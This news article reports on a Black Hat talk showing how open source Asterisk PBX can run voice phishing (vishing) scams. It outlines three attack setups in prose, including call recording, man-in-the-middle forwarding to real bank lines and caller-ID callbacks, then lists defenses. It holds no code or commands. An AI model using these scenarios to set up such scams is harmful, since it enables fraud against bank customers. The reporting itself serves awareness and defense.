As the Black Hat conference descends upon Las Vegas this week, internetnews.com presents a series of articles addressing security issues past and present.
LAS VEGAS –- It wasn’t that long ago that phishing was an e-mail-only issue. But that has recently changed with the introduction of terms such as vishing into the security lexicon.
In a presentation here at the Black Hat conference, Security Researcher Jay Shulman explained how to execute a phishing scam with the help of Asterisk PBX.
The Asterisk VoIP PBX project is perhaps the most well known and popular open source VoIP project in the world today.
It is lowering the barrier to telephony entry for
millions, including hackers out to steal your
money and personal information.
The economics of voice phishing have also changed, thanks
to open source Asterisk.
“Five years ago you would have had to buy a commercial
system; the fact that there is an open source one available
just makes this a lot more accessible,” Shulman said.
Shulman was careful to qualify that his presentation was
not intended to inspire others to follow his lesson plan.
“I’m trying to show the power of the tools, not trying to
show you what to do,” Shulman.
He did however describe, demonstrate and detail several
attack vectors for executing voice-based phishing scams.
In
one scenario, the victim is sent an e-mail and asked to
call a 1-800 number, which the attacker sets up.
At the
receiving end is the Asterisk PBX which answers the call
and asks the caller identifying questions, such as account
number and ZIP code. The PBX records and handles the call
and then hangs up.
The second attack vector was a man-in-the-middle type of
approach where the victim calls into the attacker’s 1-800
number.
The attacker’s PBX then transparently forwards the
call to a real customer service phone number, while
still staying on the line and recording all of the
information.
Shulman describes that particular approach
as being very manual, and yet very difficult to detect.
The third attack is
a combination of the first two approaches.
The victim
calls into the 1-800 number, the attacker’s PBX asks
for the personal information and the call is then transferred
to a real customer service operator.
To add further insult to injury, Shulman suggested that
the attacker could use the CallerID information from the
victim and use it to have the PBX call the user back to
confirm the call.
“It would encourage them that that they’ve done something
right, when in fact they’ve done something quite wrong,”
Shulman said.
Though most of Shulman’s talk was about exploitation paths
using Asterisk, he ended his talk with a few suggestions of
how to prevent voice-based phishing attacks.
One suggestion was that people should only ever call
the 1-800 number listed on the back of their bank or credit
cards.
The financial institutions should also step up and
warn and educate users about the risks of voice
phishing.
Shulman also suggested that call center
representatives should ask which 1-800 they dialed to
further ensure that the call is not part of a
phishing exploit.
“The only reason why this works is because social
engineering works,” Shulman said.
“This is all still
relatively new but we need to do something to point out to
people that they’ve called the wrong number.”